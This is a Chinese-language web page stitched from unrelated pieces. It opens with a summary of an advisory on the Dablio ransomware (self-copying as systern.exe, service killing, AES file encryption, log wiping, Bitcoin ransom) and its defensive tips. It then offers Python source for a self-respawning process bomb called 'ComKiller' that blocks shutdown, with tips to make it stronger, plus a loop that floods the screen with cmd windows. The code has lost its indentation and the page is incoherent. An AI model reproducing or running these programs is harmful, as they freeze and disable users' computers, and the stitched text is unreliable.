这个新型的勒索病毒叫Dablio,理论上可以感染下列文件类型,也就是你电脑中以下列名字作为后缀名的文件,全部打不开。
相关推荐:《Python入门教程》
看了上面的文件类型,我也服了。这做毒的比我还想的周到。合着有点用的文件全想感染。
我们分析发现,该恶意软件就是一款勒索软件,其具有以下功能:
一、木马会判断自身进程名是否为systern.exe。如果不是,则将自身复制为C:UsersPublicsystern.exe 并执行;
二、释放s.bat批处理脚本,关闭各种数据库和web服务及进程;
三、遍历受感染操作系统的所有盘符中的指定文件进行加密,加密后修改文件的扩展名为MyChemicalRomance4EVER;
四、木马会调用系统的wevtutil命令,对系统日志中的“系统”、“安全”和“应用程序”三部分日志内容进行清理,并删除自身;
五、使用AES对称算法进行加密;
另外,恶意木马程序完成加密后,会在操作系统中生成一个存有勒索信息的文本文件,提示并要求受感染的用户访问指定的Web网站支付一定的比特币(电子货币),系统中加密的文件才可以被解锁。
专家提醒:
针对这种情况,国家计算机病毒应急处理中心建议广大计算机用户采取如下防范措施:
(一)不要从陌生的网站下载应用程序。
(二)建议打开操作系统中防病毒软件的“实时监控”功能,对操作操作进行主动防御,这样可以第一时间监控未知病毒的入侵活动。
# 这是一个小病毒,名叫ComKiller(计算机杀手)# 效果:运行约10秒后无法正常关机
# 注:把那两行 time.sleep(0.1) 去掉效果更好哦:)
import os
import signal
import ctypes
import time
import threading
from pathlib import Path
def help_sos():
cmdr = os.system("start python %s" % FileName)
def Error():
while True:
try:
help_sos()
except BaseException:
help_sos()
time.sleep(0.1)
signal.signal(signal.SIGTERM, help_sos)
FileName = Path(__file__).name
while True:
time.sleep(1)
T = threading.Thread(target = Error, args = ())
T.start()
#仅用于娱乐,干什么非法的事情和我无关!
很简单,就三行import os
while True:
os.system('start cmd')
运行的几秒钟后,你电脑满是cmd!
